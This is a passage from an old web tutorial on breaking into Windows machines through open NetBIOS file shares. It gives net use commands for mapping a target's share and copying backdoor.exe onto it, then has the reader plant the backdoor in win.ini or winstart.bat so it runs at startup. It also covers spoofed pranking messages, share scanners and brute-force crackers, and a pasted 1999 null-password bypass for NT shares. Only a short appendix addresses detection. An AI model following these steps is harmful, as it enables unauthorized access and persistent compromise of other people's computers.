#

# In the above example, the "appname" server contains a special

# character in its name, the "popular" and "localsrv" server names are

# preloaded, and the "rhino" server name is specified so it can be used

# to later #INCLUDE a centrally maintained lmhosts file if the "localsrv"

# system is unavailable.

#

# Note that the whole file is parsed including comments on each lookup,

# so keeping the number of comments to a minimum will improve performance.

# Therefore it is not advisable to simply add lmhosts file entries onto the

# end of this file.

</pre></td>

</tr>

</table>

</blockquote>

<p>  To create an entry just open the Lmhosts file in your favorite word

processor and enter your target's IP, press tab and enter the share name

(the one that is listed in the name field). Save the file and exit.

  Now the are two methods to access the remote shares you're after: the

easy way and the cool way.</p>

<p>---  The easy way (GUI) ---</p>

<p>If you don't want to have any more trouble just press start, click find

and select find computer. Enter the target's IP address. If your Lmhosts

entry

is correct, it will show the computer you want in the search window. Just

click

on the computer icon, and start browsing through that computer like you were

browsing your own computer.</p>

<p>--- The cool way ---</p>

<p>Now it's time to get to know the net.exe program. To access the help menu

just type:</p>

<blockquote>

<p><i>net /?</i> (in a dos Window).</p>

</blockquote>

<p>I suggest to redirect all the help to a file and then read it

(use net /? > somefile.txt to redirect all output to somefile.txt and

overwrite

it, or net /? >> somefile.txt to append the output to the file without

deleting

it). You can also do net option /? to get more help about that option. To

access the share, you create a virtual drive that will be the share in the

other host.

  In order to do this you will need to enter:</p>

<blockquote>

<p><i>net use drive \\[ipaddress]\[sharename]</i></p>

</blockquote>

<p>Where:

<ul>

  <li>drive is the drive letter you want. For example f: g: z:</li>

  <li>ipaddress is the target host's IP</li>

  <li>sharename is the name of the share (remember the table we discussed about before?)</li>

</ul>

<p>After doing this you just need to type drive: and then browse the new

drive

using Ms-DOS like if you were in your own hard disk (for example, type:

  f:

  If your new virtual drive has been assigned the letter f).</p>

<p>Example:</p>

<p>Lets say that you coded a *really cool* backdoor, and you want to run on a

computer that has share enabled, the share name is Flintstone and the

ipaddress is 145.42.23.14 .</p>

<blockquote>

<p><i>c:\>net use f: \\145.42.23.14\Flinstone</i></p>

</blockquote>

<p>Now you would just need to copy the backdoor to the new virtual drive.</p>

<blockquote>

<p><i>c:\>copy backdoor.exe f:\backdoor.exe</i></p>

</blockquote>

<p>----- First Version Text ------</p>

<p>Then you would just change drive and run the backdoor.</p>

<blockquote>

<p><i>c:\>f:<br>

f:\>backdoor.exe</i></p>

</blockquote>

<p>And the backdoor is loaded, so now you can use it to access this computer.</p>

<hr width="50%" align="left">

<p>I'm deeply sorry, but what is written between the ----First Version Text---

is wrong.

Using what is there what probably would happen was installing the backdoor

in your own computer and not in the target host. Thanks to Kimmo from the

a-Men Group that correct me.

What you really need to do is to copy the backdoor.exe file to the share,

and then edit the win.ini file adding the line:</p>

<blockquote>

<p><i>run=%SystemRoot%\backdoor.exe</i></p>

</blockquote>

<hr width="50%" align="left">

<p><b>NOTE: Why %SystemRoot% ?</b><br>

We need to use %SystemRoot% instead of F:, because F: is a virtual drive  so

in the the host that drive could not exist, so you use the variable

%SystemRoot% that will return the correct drice.</p>

<hr width="50%" align="left">

<p>Of course, you can also put the backdoor in other places, such as

c:\windows\winstart.bat (enter the line  %SystemRoot%\backdoor.exe as a new

blank line). If there is no such file, create it.</p>

<h3>Messaging/Alert Service</h3>

<p>What's this feature? It doesn't let you access the files for certain, but

it's kinda fun, because what it does is send a message, in Message Box

Format

to the other host. Watch the face of the guy that is on the computer when he

sees a message box saying "Error: User To Stupid". However, you need to

remember that your host will be shown in the message box, but if you spoof

your

host, you can have a good laugh with this.

  When using this feature you also need to create a new entry in your

Lmhosts

file. Remember that this can only be used in a LAN network such as a school

LAN

with your friends, just to see their faces, nothing more. Even if you wanted

to

send it over the Internet you couldn't because it uses a broadcast system,

and

when any broadcasted packets get to a router they are immediately deleted

(security reasons. Off the topic of this tutorial).</p>

<p>To send a message to the other computer that computer needs to have a &lt;03&gt;

value. As you can see in the table somewhere in the middle of the file, &l;03

says:</p>

<p>03  messaging/alerter service; name of logged-in user <--- This one is

cool

too ---</p>

<p>So if your target computer has this turned on you can send a message by

typing:

  net send sharename message

  If you are in an LAN and don't want people to mess with you, type:

  net stop messenger

  Doing this you stop the msg service, so you won't be able to send or

receive

messages using the net send syntax. If you want to enable it again, type:</p>

<blockquote>

<p><i>net start messenger</i></p>

</blockquote>

<p>Now you'll be able to send and receive messages again.</p>

<h3><u>Appendix A: Accessing Windows shares from Unix</u></h3>

<p>The easiest way is to use an X-Windows program called

LinNeighborhood, which can be downloaded from <a href="http://www.bnro.de/~schmidjo/" target="_blank">http://www.bnro.de/~schmidjo/</a>.

However, you can also do that from your console or xterm window, by using

the

smb commands. To learn more, read the man pages of the following commands:</p>

<blockquote>

<p>smbclient<br>smbmnt<br>smbmount<br>smbprint<br>smbumount</p>

</blockquote>

<h3><u>Appendix B: Finding sharing hosts</u></h3>

<p>Suppose you're an admin that wants to scan his network for vulnerable hosts.

Suppose you're a bored cracker that wants to find possible targets. In both

cases you'd want to have a shares scanner to do the job for you.

You can use a shares scanner to scan whole subnets and look for vulnerable

hosts for you. Get Legion or NbtScan from <a href="http://packetstorm.securify.com" target="_blank">packetstorm.securify.com</a>.</p>

<h3><u>Appendix C: Password-Protected shares</u></h3>

<p>Are you an admin that wants to test how strong his password protected shares

are? Are you a cracker that came across a password-protected share and don't

know what to do? You could try to get a brute-force sharing password cracker

that'll try passwords for you until it finds the correct one. Cain is one

such

program, that also has some other features that you might want to check out.</p>

<h3><u>Appendix D: Detecting Sharing Attacks</u></h3>

<p>Sharing attacks are usually pretty easy to detect (unless the attacker is

spoofing or performing his attack from another host, thus making it appear

as

if the other host is really the attacker). The simplest program for the job

is

Lockdown 2000 (from <a href="http://www.lockdown.com" target="_blank">www.lockdown.com</a>). However, it is quite buggy and

doesn't

always perform well. You can also try Notron AtGuard (<a href="http://www.norton.com" target="_blank">www.norton.com</a>) - I

believe it can also detect sharing attacks, although I havn't tested it yet.

  However, if you're going for the real thing, you should try and get a good

firewall or intrusion detection system. My personal favorite for Unix

systems

is ipchains (search <a href="http://linux.box.sk" target="_blank">linux.box.sk</a>, <a href="http://freshmeat.net" target="_blank">freshmeat.net</a> or any of your other

favorites), while for Windows systems I recommend Firewall-1 (search the

net,

you should be able to come across it pretty quickly).</p>

<h3><u>Appendix E: An Easier Way to Access Shares</u></h3>

<p>Got the target's IP address? Good. Got the share name? Good. Now hit start,

then hit run, and then type:</p>

<blockquote>

<p><i>//ip-address(or hostname)/sharename</i><br>

For example: //65.4.78.203/someshare</p>

</blockquote>

<p>You will be able to access the share using an interface similar to what you

get

when you double-click on the "my computer" icon, and get rid of the need to

assign a virtual drive.</p>

<p><a href="http://blacksun.box.sk" target="_blank">http://blacksun.box.sk</a></p>

<h3><u>Appendix F: Breaking Password-Protected Shares Without Brute-Forcing</u></h3>

<p>The following was pasted from the Keen Veracity e-zine, volume 9:</p>

<p>[More Bugs In Windows NT]===============================================[Ntwak0]</p>

<p><b>Subject:</b> Password problem In NT when connecting to a share, should I say you

do not need a password in some cases even if it is protected I mean :)</p>

<p>Monday, December 27, 1999 by NtWaK0<br>

Tested on NT 4.0 +SP6 + SP6a.<br>

I will try to do it by example in this case you will be able to repeat it</p>

<p>--> I am going to map a network share call it X:<br>

<i>E:\Tmp>net use x: \\1.1.1.1\tmp passwordhere /user:ntwak0</i><br>

<blockquote>

The command completed successfully.</p>

</blockquote>

<p>--> I done net view to see the shared resources<br>

<i>E:\Tmp>net view \\1.1.1.1</i><br>

<blockquote>

Shared resources at \\1.1.1.1</p>

</blockquote>

<table>

<tr>

  <th>Share name

  <th>Type</th>

  <th>Used as</th>

  <th>Comment</th>

</tr>

<tr>

  <td>Tmp</td>

  <td>Disk</td>

  <td>X:</td>

  <td>&nbsp;</td>

</tr>

</table>

<p>The command completed successfully.</p>

<p>--> Now I copyed a file to X: to use the 1.1.1.1 resources.<br>

<i>E:\Tmp>copy test.txt x:</i><br>

<blockquote>

        1 file(s) copied.</p>

</blockquote>

<p>--> Now I delete the connection I created to 1.1.1.1 using X:<br>

<i>E:\Tmp>net use /delete x:</i><br>

<blockquote>

x: was deleted successfully.</p>

</blockquote>

<p>--> Now I tryed to recreate the connection using NULL password just for fun i was doing this<br>

<i>E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0</i><br>

<blockquote>

System error 1326 has occurred.<br>

Logon failure: unknown user name or bad password.<br>

</blockquote>

E:\Tmp></p>

<p>--> It is normal I could not login now I done</p>

<p><b>The Bug:</b></p>

<p>--> Now Reconnect using the command line<br>

<i>E:\Tmp>net use x: \\1.1.1.1\tmp passwordhere /user:ntwak0</i><br>

<blockquote>

The command completed successfully.</p>

</blockquote>

<p>--> I used Explorer to copy the same file test.txt from my drive E:\tmp to the

mapped drive X:</p>

<p>--> I got a msg saying "The file already exist do you wana overwrite it?"

I said yes, well it is normal I did copy it before as you saw in the step

above .</p>

<p>--> After copying the file in explorer I did right click on X:

(the mapped drive) and disconnect</p>

<p>--> I got a msg box saying "There are currently files open on X:

(connected to \\1.1.1.1\tmp).<br>

If you do close the files before disconnecting from the network, data may be

lost.</p>

<p>"Do you want to disconnect the device anyway?"</p>

<p>Then I clicked Yes in this case I have no more connection mapped to X:

In this case I should not be able to connect without password or username

but not true ;)</p>

<p>--> Next I do not know what I tried it I guess for fun In DOS window I typed</p>

<i>E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0</i><br>

<blockquote>

The command completed successfully.</p>

</blockquote>

<p>--> W00t I was able to login I did not believe hehe with no password.</p>

<p>--> To make sure i was not dreaming or missing sleep, I was able to repeat it

like 10 times.</p>

<p>But if you do connect and disconnect using net use /delete x: this will work and

you cannot connect with no password like the explore case.</p>

<p>





So you this is a security bug that you can reproduce it in explore and

DOS command and it has to follow certain steps .

What do I mean by that ? well you have to disconnect using explore and when you

get the msg saying :

"There are currently files open on X:(connected to \\1.1.1.1\tmp) blah blah...

In that case if you disconnect and reconnect right after using no password that

should work. ;)

But if you do it all from the command line this should not work and that

is normal.</p>

<p>Here is an example done all by command line:</p>

<p><i>E:\Tmp>net use x: \\1.1.1.1\tmp " q]a'z/ " /user:ntwak0</i><br>

<blockquote>

The command completed successfully.</p>

</blockquote>

<p><i>E:\Tmp>copy test.txt x:test.txt</i><br>

<blockquote>

1 file(s) copied.</p>

</blockquote>

<p><i>E:\Tmp>net use /delete x:</i><br>

<blockquote>

x: was deleted successfully.</p>

</blockquote>

<p><i>E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0</i><br>

<blockquote>

System error 1326 has occurred.

Logon failure: unknown user name or bad password.<br>

</blockquote>

E:\Tmp></p>

<p>&nbsp;</p>

<pre>Cheers,

|-+-||-+-|-+-|-+-|oOo-(NtWaK0)(Telco. Eng. Etc..)-oOo|-+-|-+-|-+-||-+-|

The only secure computer is one that's unplugged, locked in a

safe, and buried 20 feet under the ground in a secret location...

and i'm not even too sure about that one"--Dennis Huges, FBI.

|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-||-+-||-+-|

Live Well Do Good --:)</pre>



</body>

</html>